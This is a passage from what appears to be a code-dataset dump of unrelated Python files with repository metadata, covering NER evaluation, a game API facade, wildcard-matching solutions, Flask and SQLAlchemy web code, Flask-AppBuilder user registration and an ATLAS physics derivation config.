use_crf_layer: bool = True) -> np.ndarray:
"""
:return: numpy array containing (number of true positive, number of all positive, number of true positive + number of false negative)
You can also refer as (number of correctly predicted entities, number of entities predicted, number of entities in the dataset)
"""
p = 0
total_entity = 0
total_predict = 0
word_seq_lens = word_seq_lens.tolist()
for idx in range(len(batch_pred_ids)):
length = word_seq_lens[idx]
output = batch_gold_ids[idx][:length].tolist()
prediction = batch_pred_ids[idx][:length].tolist()
prediction = prediction[::-1] if use_crf_layer else prediction
output = [idx2label[l] for l in output]
prediction =[idx2label[l] for l in prediction]
batch_insts[idx].prediction = prediction
#convert to span
output_spans = set()
start = -1
# for i in range(len(output)):
# if output[i].startswith("B-"):
# start = i
# if output[i].startswith("E-"):
# end = i
# output_spans.add(Span(start, end, output[i][2:]))
# if output[i].startswith("S-"):
# output_spans.add(Span(i, i, output[i][2:]))
# predict_spans = set()
# for i in range(len(prediction)):
# if prediction[i].startswith("B-"):
# start = i
# if prediction[i].startswith("E-"):
# end = i
# predict_spans.add(Span(start, end, prediction[i][2:]))
# if prediction[i].startswith("S-"):
# predict_spans.add(Span(i, i, prediction[i][2:]))
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
predict_spans = set()
for i in range(len(prediction)):
if prediction[i].startswith("B-"):
start = i
if prediction[i].startswith("E-"):
end = i
predict_spans.add(Span(start, end, prediction[i][2:]))
if prediction[i].startswith("S-"):
predict_spans.add(Span(i, i, prediction[i][2:]))
total_entity += len(output_spans)
total_predict += len(predict_spans)
p += len(predict_spans.intersection(output_spans))
# In case you need the following code for calculating the p/r/f in a batch.
# (When your batch is the complete dataset)
# precision = p * 1.0 / total_predict * 100 if total_predict != 0 else 0
# recall = p * 1.0 / total_entity * 100 if total_entity != 0 else 0
# fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return np.asarray([p, total_predict, total_entity], dtype=int)
| [
"1399350807@qq.com"
] | 1399350807@qq.com |
02d5599e8cefba6aba67e00d744ef474a2d137de | b15a9d9c7374c4a1fa5ec3ef63603a8c57e8681f | /Design-Patterns-Python/facade/game_api.py | c049520bdfdac8376257014495a620024530efab | [] | no_license | gohils/zemr_notebook | 3f7490ef7a2559655746c3e2e0dbfb835a83891e | 00d53cea9970df44160c51e6ad2bdeadfae2c91f | refs/heads/master | 2023-08-04T14:32:35.428016 | 2023-07-20T11:51:08 | 2023-07-20T11:51:08 | 222,027,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | "The Game API facade"
from decimal import Decimal
from users import Users
from wallets import Wallets
from game_engine import GameEngine
from reports import Reports
class GameAPI():
"The Game API facade"
@staticmethod
def get_balance(user_id: str) -> Decimal:
"Get a players balance"
return Wallets.get_balance(user_id)
@staticmethod
def game_state() -> dict:
"Get the current game state"
return GameEngine().get_game_state()
@staticmethod
def get_history() -> dict:
"get the game history"
return Reports.get_history()
@staticmethod
def change_pwd(user_id: str, password: str) -> bool:
"change users password"
return Users.change_pwd(user_id, password)
@staticmethod
def submit_entry(user_id: str, entry: Decimal) -> bool:
"submit a bet"
return GameEngine().submit_entry(user_id, entry)
@staticmethod
def register_user(value: dict[str, str]) -> str: # Python 3.9
# def register_user(value) -> str: # Python 3.8 and earlier
"register a new user and returns the new id"
return Users.register_user(value)
| [
"noreply@github.com"
] | gohils.noreply@github.com |
996b44812bd5d0977998f519cc46389a487cbfff | f54fdbb8301f54dda8551bb811e864d3a81da6de | /Python/심화_클래스활용_실습코드/Advanced_OOP_6.py | 92141b2e98259d343ecd114a4d1b92c725d51320 | [] | no_license | Jerrykim91/Daily | 0533afe1956ca5cc88f7d69f7810b489240e70e6 | 30f738fc9728b7501bf5601e17189f47c13aaec9 | refs/heads/master | 2021-07-24T23:18:09.686269 | 2020-10-17T12:07:57 | 2020-10-17T12:07:57 | 226,638,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py |
# 출처 : README.md 참조
"""
클래스 메소드의 사용법 +
# 리턴하는 기능을 가진 스태틱 메소드
"""
class Person(object):
# my_class_var = 'sanghee'
def __init__(self, year, month, day, sex):
self.year = year
self.month = month
self.day = day
self.sex = sex
def __str__(self):
return '{}년 {}월 {}일생 {}'.format(self.year, self.month, self.day, self.sex)
@classmethod
def ssnConstructor(cls, ssn):
front, back = ssn.split('-')
sex = back[0]
if sex == '1' or sex == '2':
year = '19' + front[:2]
else :
year = '20' + front[:2]
if (int(sex)%2) == 0 :
sex = '여성'
else :
sex = '남성'
month = front[2:4]
day = front[4:6]
return cls(year, month, day, sex)
@staticmethod
def isWorkDay(day):
"""
근무 여부를 리턴하는 기능을 가진 스태틱 메소드
월: 0, 화: 1, 수: 2, 목: 3, 금: 4, 토: 5, 일: 6
"""
if day.weekday() == 5 or day.weekday() == 6 :
return False
return True
ssn_1 = '900829-1000006'
ssn_2 = '951224-2000069'
ssn_3 = '201214-4000069'
Jun = Person.ssnConstructor(ssn_1)
Jain = Person.ssnConstructor(ssn_2)
Rose = Person.ssnConstructor(ssn_3)
print(Jun)
print(Jain)
print(Rose)
import datetime
myDate = datetime.date(2020, 6, 21)
yourDate = datetime.date(2020, 6, 22)
print(Person.isWorkDay(myDate)) # 클래스를 통하여 스태틱 메소드 호출
print(Rose.isWorkDay(myDate)) # 인스턴스를 통하여 스태틱 메소드 호출
print('='*25)
print(Person.isWorkDay(yourDate))
print(Rose.isWorkDay(yourDate)) | [
"sun4131@gmail.com"
] | sun4131@gmail.com |
ddc15468630f01ae1dab3138722888d249e76ae0 | 7548c8efccb43b1d8daec719bd7d8ad4a4d03630 | /Wildcard Matching/Leetcode_44.py | 7999629e5a083344bd36c21f952567b1a3033e3d | [] | no_license | arw2019/AlgorithmsDataStructures | fdb2d462ded327857d72245721d3c9677ba1617b | 9164c21ab011c90944f844e3c359093ce6180223 | refs/heads/master | 2023-02-17T11:50:07.418705 | 2021-01-19T19:37:17 | 2021-01-19T19:37:17 | 204,222,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,764 | py | # dynamic program
# O(m*n) runtime, O(n) space
class Solution:
def isMatch(self, s: str, p: str) -> bool:
m, n = len(s), len(p)
cur = [True] + [False]*(m)
print(cur)
for j in range(1, n+1):
pre = cur[0]
cur[0] = cur[0] and (p[j-1] == '*')
for i in range(1, m+1):
if p[j-1] != '*':
pre, cur[i] = cur[i], pre and (s[i-1]==p[j-1] or p[j-1]=='?')
else:
pre, cur[i] = cur[i], cur[i-1] or cur[i]
return cur[m]
# dynamic program
# o(m*n) runtime, o(m*n) space
class Solution:
def isMatch(self, s: str, p: str) -> bool:
m, n = len(s), len(p)
dp = [[False]*(n+1) for _ in range(m+1)]
dp[0][0] = True
for j in range(1, n+1):
dp[0][j] = p[j-1] == '*' and dp[0][j-1]
for j in range(1, n+1):
for i in range(1, m+1):
if p[j-1] != '*':
if p[j-1] in ('?', s[i-1]):
dp[i][j] = dp[i-1][j-1]
else:
dp[i][j] = dp[i][j-1] or dp[i-1][j]
return dp[-1][-1]
# finite-state machine solution
class Solution:
def isMatch(self, s: str, p: str) -> bool:
transfer = {}
state = 0
for char in p:
if char == '*':
transfer[state, char] = state
else:
transfer[state, char] = state + 1
state += 1
print(transfer)
accept = state
state = {0}
for char in s:
state = {transfer.get((at, token)) for at in state for token in (char, '*', '?')}
return accept in state
| [
"noreply@github.com"
] | arw2019.noreply@github.com |
820a5e2454cddcd8cb18cb9f6630a71d464f709e | f55e27646398ccf20b99d4bf1afdb4cdf1b2f30d | /app/role/models.py | 3501c6f3594509c1dd44d4e2227a3b3da7cd12a1 | [] | no_license | sartim/flask_shop_api | 1f8b96ccdf6bae5b080fa0ff29116f2cbec14c4b | 07b6b4460593ce736866ead6e5f3682b16fc5316 | refs/heads/master | 2023-08-02T23:40:25.897464 | 2023-05-20T06:12:38 | 2023-05-20T06:12:38 | 176,507,271 | 2 | 4 | null | 2023-07-25T22:18:45 | 2019-03-19T12:28:44 | Python | UTF-8 | Python | false | false | 1,473 | py | from app import db
from sqlalchemy import text
from sqlalchemy.dialects.postgresql import UUID
from app.core.base_model import BaseModel, AbstractBaseModel
class Role(BaseModel):
__tablename__ = 'role'
id = db.Column(
UUID(as_uuid=True), primary_key=True,
server_default=text("uuid_generate_v4()")
)
name = db.Column(db.String(255), unique=True, nullable=False)
description = db.Column(db.Text)
deleted = db.Column(db.Boolean, default=False)
permissions = db.relationship("RolePermission", lazy=False)
def __init__(self, id=None, name=None, description=None, deleted=None):
self.id = id
self.name = name
self.description = description
self.deleted = deleted
def __repr__(self):
return "<%r (%r)>" % (self.__class__.__name__, self.name)
class RolePermission(AbstractBaseModel):
__tablename__ = 'role_permission'
role_id = db.Column(UUID(as_uuid=True), db.ForeignKey('role.id'), primary_key=True)
permission_id = db.Column(
UUID(as_uuid=True), db.ForeignKey('permission.id'), primary_key=True
)
role = db.relationship('Role', lazy=False, overlaps="permissions")
permission = db.relationship('Permission', lazy=False)
def __init__(self, role_id=None, permission_id=None):
self.role_id = role_id
self.permission_id = permission_id
def __repr__(self):
return "<%r (%r)>" % (self.__class__.__name__, self.name)
| [
"sarrtim@gmail.com"
] | sarrtim@gmail.com |
932330f52d59db3f156a0cd226118ccfa8de456a | f3f42cd16c7c39f54dcb6891d37369542cf7bc00 | /server.py | e2803cd828506afe19777eb49fcf7cdcd4d4f16b | [] | no_license | imhardikj/inception | 3cfb1d492669c30fdedc65d26c91bc6ee9846bc0 | 7585afa0586a73f4a5553b384b791e68383f0c29 | refs/heads/master | 2020-11-25T02:11:32.171346 | 2019-12-16T18:10:14 | 2019-12-16T18:10:14 | 228,446,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | import os
from flask import Flask, request, redirect,jsonify
from werkzeug.utils import secure_filename
from try_retrain import predict_image_class
from bs4 import BeautifulSoup
import requests
UPLOAD_FOLDER = 'D:/'
ALLOWED_EXTENSIONS = set([ 'png', 'jpg', 'jpeg'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/alzheimer')
def alzheimer():
    """Scrape Google News for Alzheimer stories; return up to 10 as JSON."""
    response = requests.get("https://news.google.com/search?q=alzheimer")
    soup = BeautifulSoup(response.content, 'html5lib')
    articles = soup.findAll('article')
    print(len(articles))  # debug: total article count before truncation
    items = []
    for article in articles[:10]:
        # contents[1] holds the headline anchor, contents[3] the source/time row.
        headline, meta = article.contents[1], article.contents[3]
        items.append({
            'url': headline.a['href'],
            'title': headline.a.text,
            'source': meta.div.a.text,
            'time': meta.div.time.text,
        })
    return jsonify(items)
@app.route('/cancer')
def cancer():
    """Scrape Google News for cancer stories; return up to 10 as JSON."""
    response = requests.get("https://news.google.com/search?q=cancer")
    soup = BeautifulSoup(response.content, 'html5lib')
    articles = soup.findAll('article')
    print(len(articles))  # debug: total article count before truncation
    items = []
    for article in articles[:10]:
        # contents[1] holds the headline anchor, contents[3] the source/time row.
        headline, meta = article.contents[1], article.contents[3]
        items.append({
            'url': headline.a['href'],
            'title': headline.a.text,
            'source': meta.div.a.text,
            'time': meta.div.time.text,
        })
    return jsonify(items)
@app.route('/', methods=['GET', 'POST'])
def upload_file():
    """Accept an image upload (POST), classify it and return the result.

    BUG FIX: the original handler returned None both for plain GET requests
    and for POSTs whose file extension was not allowed, which makes Flask
    raise "view function did not return a valid response".  Both paths now
    return an explicit response.
    """
    print("START")
    if request.method == 'POST':
        # The multipart form must contain a part named 'file'.
        if 'file' not in request.files:
            print('No file part')
            return redirect(request.url)
        file = request.files['file']
        # Browsers submit an empty filename when no file was selected.
        if file.filename == '':
            print('No selected file')
            return redirect(request.url)
        if file and allowed_file(file.filename):
            filename = secure_filename(file.filename)
            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
            testres = predict_image_class(UPLOAD_FOLDER + filename)
            print(testres)
            return jsonify(testres)
        # Disallowed extension: report instead of silently returning None.
        return jsonify({'error': 'file type not allowed'}), 400
    # Plain GET: nothing to classify yet.
    return 'Upload an image via POST to this endpoint.'
# Run the Flask development server, reachable from any network interface.
if __name__ == '__main__':
    app.run(debug = True,host='0.0.0.0')
| [
"noreply@github.com"
] | imhardikj.noreply@github.com |
60dce4a3326a9bdffb8321222519728bd4e53b3e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_exempts.py | ba3ae516ff8f24200a01a7f19517c7cf4bb06803 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py |
from xai.brain.wordbase.adjectives._exempt import _EXEMPT
#calss header
class _EXEMPTS(_EXEMPT):
    """Word entry for "exempts", a surface form of the adjective "exempt"."""

    def __init__(self):
        super().__init__()
        self.name = "EXEMPTS"
        self.basic = "exempt"
        self.specie = 'adjectives'
        self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
9f8a8dd6b836f1686c9e46fb4cba274438d27581 | 7b67ea903cc08e31c6156fa4bb7b40b64950b474 | /note32/test_context.py | 7692a0cb759e99eaecbd3a04658721c84423417d | [
"MIT"
] | permissive | icexmoon/python-learning-notes | 62596c2d6a439f30c8c0637eca1af36d88a3bea6 | 838c91d896404290b89992b6517be1b6a79df41f | refs/heads/main | 2023-05-27T11:21:25.575286 | 2021-06-08T07:33:22 | 2021-06-08T07:33:22 | 365,742,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | def test_yield():
print('start')
yield 1
print('after')
# Drive the generator by hand: the second next() resumes after the yield,
# runs the trailing print, and then raises StopIteration (shown below).
ty = test_yield()
next(ty)
next(ty)
# Expected output:
# start
# after
# Traceback (most recent call last):
#   File "D:\workspace\python\python-learning-notes\note32\test.py", line 8, in <module>
#     next(ty)
# StopIteration
"icexmoon@qq.com"
] | icexmoon@qq.com |
f56cd91fa9140e05b12a527a040d556bb0d9b957 | 4f8ddd9808535ee8aa900393c3a429f480324574 | /Manipulação_Arquivo/io_1.py | 3b10d40c98aceb024f65e4886c0c612f6187de6c | [] | no_license | kamibarreto/Cod3r | 1de8bb5288c16f90e1060089e7fda8216b6cb7cf | cea86f3984e3d43c0726b9ea809505d00679a314 | refs/heads/master | 2022-12-22T23:13:59.176534 | 2020-09-05T11:01:10 | 2020-09-05T11:01:10 | 284,170,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #!/usr/bin/env python3
# Read the whole CSV into memory.  A with-block guarantees the file handle is
# closed even if read() raises; the original open()/close() pair leaked the
# handle on error.
with open('/home/kami/Projetos/Cod3r/Manipulação_Arquivo/pessoas.csv') as arquivo:
    dados = arquivo.read()

# Each line holds "name,age"; unpack both fields into the template.
for registro in dados.splitlines():
    print('Nome: {}\n Idade: {}'.format(*registro.split(',')))
| [
"fabinhobarreto9928@gmail.com"
] | fabinhobarreto9928@gmail.com |
9d848e5fe1603a3252c87bcf55000026afc62ae7 | 6ca3acb227e340edbee80668591e7008cc256b5b | /flask_appbuilder/security/registerviews.py | b341bd27b4e7c10149f5e510a65bd6c77abb877c | [
"BSD-3-Clause"
] | permissive | tuxskar/Flask-AppBuilder | 4c69dce5c13f85b930d5b4761945b33ffb231ef7 | 4f65bbbd7edc6e7ca7c5f62a499677565e0662e1 | refs/heads/master | 2021-01-12T21:04:22.702263 | 2014-12-17T00:20:58 | 2014-12-17T00:20:58 | 28,113,074 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,361 | py | __author__ = 'dpgaspar'
import uuid
import sys
import logging
from werkzeug.security import generate_password_hash
from flask import render_template, flash, redirect, session, url_for, request
from ..views import expose, PublicFormView
from openid.consumer.consumer import Consumer, SUCCESS, CANCEL
from flask.ext.openid import SessionWrapper, OpenIDResponse, OpenID
from flask.ext.babelpkg import gettext, lazy_gettext
from .models import User, RegisterUser
from .forms import RegisterUserOIDForm, RegisterUserDBForm, LoginForm_oid
from ..models.sqla.interface import SQLAInterface
from ..validators import Unique
from .._compat import as_unicode
log = logging.getLogger(__name__)
def get_first_last_name(fullname):
    """Split *fullname* into a ``(first_name, last_name)`` tuple.

    The first whitespace-separated token is the first name; the remaining
    tokens are joined into the last name.  BUG FIX: the original implicitly
    returned None for an empty/whitespace-only *fullname*, which broke
    callers that unpack the result into two variables; ``('', '')`` is now
    returned instead.
    """
    names = fullname.split()
    if len(names) > 1:
        return names[0], ' '.join(names[1:])
    if names:
        return names[0], ''
    return '', ''
class BaseRegisterUser(PublicFormView):
    """Base view for self-service user registration.

    Inherit from this class to implement a completely different registration
    process; otherwise inherit from RegisterUserDBView or RegisterUserOIDView
    depending on your authentication method, then override the
    SecurityManager property that defines the class to use::

        from flask.ext.appbuilder.security.registerviews import RegisterUserDBView

        class MyRegisterUserDBView(BaseRegisterUser):
            email_template = 'register_mail.html'
            ...

        class MySecurityManager(SecurityManager):
            registeruserdbview = MyRegisterUserDBView

    When instantiating AppBuilder set your own SecurityManager class::

        appbuilder = AppBuilder(app, db.session, security_manager_class=MySecurityManager)
    """
    route_base = '/register'
    email_template = 'appbuilder/general/security/register_mail.html'
    """ The template used to generate the email sent to the user """
    email_subject = lazy_gettext('Account activation')
    """ The email subject sent to the user """
    activation_template = 'appbuilder/general/security/activation.html'
    """ The activation template, shown when the user is activated """

    def send_email(self, register_user):
        """Send the activation email for *register_user*.

        Returns True on success, False when Flask-Mail is missing or the
        send fails.
        """
        try:
            # Imported lazily so the package works without Flask-Mail when
            # registration is not used.
            from flask_mail import Mail, Message
        except:
            log.error("Install Flask-Mail to use User registration")
            return False
        mail = Mail(self.appbuilder.get_app)
        msg = Message()
        msg.subject = self.email_subject
        # Absolute URL so the link works from the recipient's mail client.
        url = url_for('.activation', _external=True, activation_hash=register_user.registration_hash)
        msg.html = render_template(self.email_template,
                                   url=url,
                                   username=register_user.username,
                                   first_name=register_user.first_name,
                                   last_name=register_user.last_name)
        msg.recipients = [register_user.email]
        try:
            mail.send(msg)
        except Exception as e:
            log.error("Send email exception: {0}".format(str(e)))
            return False
        return True

    def add_registration(self, username, first_name, last_name, email, password=''):
        """Create a pending registration request and email its activation link.

        The row is committed only if the email is sent successfully;
        otherwise the session is rolled back.

        :rtype : RegisterUser
        """
        register_user = RegisterUser()
        register_user.username = username
        register_user.email = email
        register_user.first_name = first_name
        register_user.last_name = last_name
        register_user.password = generate_password_hash(password)
        # Random hash used as the one-time activation token in the email URL.
        register_user.registration_hash = str(uuid.uuid1())
        try:
            self.appbuilder.get_session.add(register_user)
        except Exception as e:
            log.exception("Add record error: {0}".format(str(e)))
            flash(as_unicode(self.error_message), 'danger')
            self.appbuilder.get_session.rollback()
            return None
        if self.send_email(register_user):
            self.appbuilder.get_session.commit()
            flash(as_unicode(self.message), 'info')
        else:
            flash(as_unicode(self.error_message), 'danger')
            self.appbuilder.get_session.rollback()
        return register_user

    @expose('/activation/<string:activation_hash>')
    def activation(self, activation_hash):
        """Activation endpoint linked from the registration email.

        Looks up the pending registration by its hash, creates the real user
        with the configured self-registration role, and deletes the pending
        row.  On any failure the transaction is rolled back and the user is
        redirected to the index page.
        """
        reg = self.appbuilder.get_session.query(RegisterUser).filter(
            RegisterUser.registration_hash == activation_hash).scalar()
        try:
            if not self.appbuilder.sm.add_user(username=reg.username,
                                               email=reg.email,
                                               first_name=reg.first_name,
                                               last_name=reg.last_name,
                                               role=self.appbuilder.sm.get_role_by_name(
                                                   self.appbuilder.sm.auth_user_registration_role),
                                               password=reg.password):
                raise Exception('Could not add user to DB')
            self.appbuilder.get_session.delete(reg)
        except Exception as e:
            log.exception("Add record on user activation error: {0}".format(str(e)))
            flash(as_unicode(self.error_message), 'danger')
            self.appbuilder.get_session.rollback()
            return redirect(self.appbuilder.get_url_for_index)
        self.appbuilder.get_session.commit()
        return render_template(self.activation_template,
                               username=reg.username,
                               first_name=reg.first_name,
                               last_name=reg.last_name,
                               appbuilder=self.appbuilder)
class RegisterUserDBView(BaseRegisterUser):
    """Registration view for database (auth db) authentication mode."""
    form = RegisterUserDBForm
    """ The WTForm form presented to the user to register himself """
    form_title = lazy_gettext('Fill out the registration form')
    """ The form title """
    redirect_url = '/'
    error_message = lazy_gettext('Not possible to register you at the moment, try again later')
    message = lazy_gettext('Registration sent to your email')
    """ The message shown on a successful registration """

    def form_get(self, form):
        """Attach uniqueness validators for username/email before rendering.

        NOTE(review): the ``len(...) == 1`` / ``len(...) == 2`` guards appear
        to prevent appending the Unique validators more than once across
        requests (the counts presumably match the form's declared
        validators) -- confirm against RegisterUserDBForm.
        """
        datamodel_user = SQLAInterface(User, self.appbuilder.get_session)
        datamodel_register_user = SQLAInterface(RegisterUser, self.appbuilder.get_session)
        if len(form.username.validators) == 1:
            form.username.validators.append(Unique(datamodel_user, 'username'))
            form.username.validators.append(Unique(datamodel_register_user, 'username'))
        if len(form.email.validators) == 2:
            form.email.validators.append(Unique(datamodel_user, 'email'))
            form.email.validators.append(Unique(datamodel_register_user, 'email'))

    def form_post(self, form):
        """On a valid submission, queue the registration (sends the email)."""
        self.add_registration(username=form.username.data,
                              first_name=form.first_name.data,
                              last_name=form.last_name.data,
                              email=form.email.data,
                              password=form.password.data)
class RegisterUserOIDView(BaseRegisterUser):
    """Registration view for OpenID (auth OID) authentication mode."""
    route_base = '/register'

    form = RegisterUserOIDForm
    form_title = lazy_gettext('Fill out the registration form')
    error_message = lazy_gettext('Not possible to register you at the moment, try again later')
    message = lazy_gettext('Registration sent to your email')
    default_view = 'form_oid_post'

    @expose("/formoidone", methods=['GET', 'POST'])
    def form_oid_post(self, flag=True):
        """Two-phase OpenID registration endpoint.

        First phase: show the OpenID login form and redirect to the
        provider.  Second phase (after the provider calls back and
        ``after_login`` stored the response in the session): pre-fill the
        registration form from the OpenID attributes and render it.
        """
        if flag:
            # Let the OpenID machinery consume a provider callback, if any.
            self.oid_login_handler(self.form_oid_post, self.appbuilder.sm.oid)
        form = LoginForm_oid()
        if form.validate_on_submit():
            session['remember_me'] = form.remember_me.data
            return self.appbuilder.sm.oid.try_login(form.openid.data, ask_for=['email', 'fullname'])
        # One-shot: the OpenID response was stashed by after_login().
        resp = session.pop('oid_resp', None)
        if resp:
            self._init_vars()
            form = self.form.refresh()
            self.form_get(form)
            form.username.data = resp.email
            first_name, last_name = get_first_last_name(resp.fullname)
            form.first_name.data = first_name
            form.last_name.data = last_name
            form.email.data = resp.email
            widgets = self._get_edit_widget(form=form)
            #self.update_redirect()
            return self.render_template(self.form_template,
                                        title=self.form_title,
                                        widgets=widgets,
                                        form_action='form',
                                        appbuilder=self.appbuilder)
        else:
            flash(as_unicode(self.error_message), 'warning')
            return redirect(self.get_redirect())

    def oid_login_handler(self, f, oid):
        """Hackish method to make use of the ``oid.login_handler`` decorator.

        Replays the logic of Flask-OpenID's decorator manually: if the
        request is not an OpenID completion callback, call *f* again with
        ``flag=False``; otherwise complete the OpenID handshake and dispatch
        on its status.
        """
        if request.args.get('openid_complete') != u'yes':
            return f(False)
        consumer = Consumer(SessionWrapper(self), oid.store_factory())
        openid_response = consumer.complete(request.args.to_dict(),
                                            oid.get_current_url())
        if openid_response.status == SUCCESS:
            return self.after_login(OpenIDResponse(openid_response, []))
        elif openid_response.status == CANCEL:
            oid.signal_error(u'The request was cancelled')
            return redirect(oid.get_current_url())
        oid.signal_error(u'OpenID authentication error')
        return redirect(oid.get_current_url())

    def after_login(self, resp):
        """Stash the OpenID response in the session.

        The key is popped (deleted) by ``form_oid_post`` on the next request.
        """
        session['oid_resp'] = resp

    def form_get(self, form):
        """Attach uniqueness validators, same scheme as RegisterUserDBView.

        NOTE(review): the ``len(...)`` guards appear to prevent duplicate
        appends of the Unique validators -- confirm against
        RegisterUserOIDForm's declared validators.
        """
        datamodel_user = SQLAInterface(User, self.appbuilder.get_session)
        datamodel_register_user = SQLAInterface(RegisterUser, self.appbuilder.get_session)
        if len(form.username.validators) == 1:
            form.username.validators.append(Unique(datamodel_user, 'username'))
            form.username.validators.append(Unique(datamodel_register_user, 'username'))
        if len(form.email.validators) == 2:
            form.email.validators.append(Unique(datamodel_user, 'email'))
            form.email.validators.append(Unique(datamodel_register_user, 'email'))

    def form_post(self, form):
        """Queue the registration; OID users register without a password."""
        self.add_registration(username=form.username.data,
                              first_name=form.first_name.data,
                              last_name=form.last_name.data,
                              email=form.email.data)
| [
"danielvazgaspar@gmail.com"
] | danielvazgaspar@gmail.com |
083ba568862e297eb94e0c17898fa3699f67ce16 | 6066b2af4b4f6ab967cfb8af8ec3b8ee68545ab9 | /Key Terms Extraction/Topics/Regexps in Python/Match or not match/main.py | 7a794774d3b29e1f7480885d26d99a3befeb3b5c | [] | no_license | zsbati/PycharmProjects | 7b29b210b4878af42baf288c585675d0203b9805 | c13b05901c5ff8ea6fc7bcb61c70aa40940daa56 | refs/heads/main | 2023-09-04T09:01:19.315655 | 2021-10-24T16:24:43 | 2021-10-24T16:24:43 | 401,172,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | import re
def matched(template, string):
return re.match(template, string) is not None
| [
"zbati123@gmail.com"
] | zbati123@gmail.com |
5e5c71a02a8be32bfa37c518c777781b96b690f6 | 2dbaf18e92d31a2b8a5ffbd213c62a94a3256076 | /taobei/tbbuy/models/cart_product.py | f264206ebfa05d7f7c20112b4d64781658dac435 | [] | no_license | ruoshengyuan/guanfang | 17c289677f44a50fdd4ae7a1d9858608228496e0 | 251f514636c4828f28aa65b2bd6fc1fe46f4437a | refs/heads/master | 2022-12-13T18:05:50.268182 | 2019-09-24T13:42:09 | 2019-09-24T13:42:09 | 201,073,359 | 3 | 0 | null | 2022-12-07T23:53:57 | 2019-08-07T15:04:07 | Python | UTF-8 | Python | false | false | 839 | py | from sqlalchemy import Column, Integer, String, ForeignKey, UniqueConstraint, Index
from sqlalchemy.orm import relationship
from marshmallow import Schema, fields, post_load
from .base import Base
class CartProduct(Base):
    """One shopping-cart line: a user holds *amount* units of a product."""
    __tablename__ = 'cart_product'
    __table_args__ = (
        # A product appears at most once per user's cart.
        UniqueConstraint('user_id', 'product_id'),
        Index('idx_product_id', 'product_id'),
    )

    # Owning user's id.
    user_id = Column(Integer, nullable=False)
    # Referenced product's id.
    product_id = Column(Integer, nullable=False)
    # Quantity in the cart; defaults to a single unit.
    amount = Column(Integer, nullable=False, default=1)
class CartProductSchema(Schema):
    """Marshmallow (de)serialization schema for CartProduct rows."""
    id = fields.Int()
    user_id = fields.Int()
    product_id = fields.Int()
    amount = fields.Int()
    created_at = fields.DateTime()
    updated_at = fields.DateTime()

    @post_load
    def make_cart_product(self, data):
        # Turn the validated dict into a model instance after load().
        # NOTE(review): marshmallow 3 passes extra **kwargs to @post_load
        # hooks; this signature implies marshmallow 2 -- confirm the pinned
        # version.
        return CartProduct(**data)
| [
"jaggerwang@gmail.com"
] | jaggerwang@gmail.com |
3819d5a9b598f699ab0e2807b410b5841ee47825 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/PhysicsAnalysis/DerivationFramework/DerivationFrameworkExotics/share/EXOT9.py | 716d4dc175f4037ddd5a4a78237cff509e18f99b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,760 | py | #********************************************************************
# EXOT9.py
# reductionConf flag EXOT9 in Reco_tf.py
#********************************************************************
from DerivationFrameworkCore.DerivationFrameworkMaster import *
from DerivationFrameworkJetEtMiss.JetCommon import *
from DerivationFrameworkJetEtMiss.METCommon import *
from DerivationFrameworkEGamma.EGammaCommon import *
from DerivationFrameworkMuons.MuonsCommon import *
from DerivationFrameworkCore.WeightMetadata import *
from AthenaCommon.GlobalFlags import globalflags
# Determine whether this job runs over simulation (geant4) or real data.
isMC = False
if globalflags.DataSource()=='geant4':
    isMC = True

exot9Seq = CfgMgr.AthSequencer("EXOT9Sequence")

#====================================================================
# THINNING TOOLS
#====================================================================
thinningTools = []

# Tracks associated with Muons
# Keep only inner-detector tracks within dR < 0.4 of a muon.
from DerivationFrameworkInDet.DerivationFrameworkInDetConf import DerivationFramework__MuonTrackParticleThinning
EXOT9MuonTPThinningTool = DerivationFramework__MuonTrackParticleThinning(name = "EXOT9MuonTPThinningTool",
                                                                         ThinningService = "EXOT9ThinningSvc",
                                                                         MuonKey = "Muons",
                                                                         InDetTrackParticlesKey = "InDetTrackParticles",
                                                                         ConeSize = 0.4)
ToolSvc += EXOT9MuonTPThinningTool
thinningTools.append(EXOT9MuonTPThinningTool)

# Tracks associated with Electrons
# Keep only inner-detector tracks within dR < 0.4 of an electron.
from DerivationFrameworkInDet.DerivationFrameworkInDetConf import DerivationFramework__EgammaTrackParticleThinning
EXOT9ElectronTPThinningTool = DerivationFramework__EgammaTrackParticleThinning(name = "EXOT9ElectronTPThinningTool",
                                                                               ThinningService = "EXOT9ThinningSvc",
                                                                               SGKey = "Electrons",
                                                                               InDetTrackParticlesKey = "InDetTrackParticles",
                                                                               ConeSize = 0.4)
ToolSvc += EXOT9ElectronTPThinningTool
thinningTools.append(EXOT9ElectronTPThinningTool)
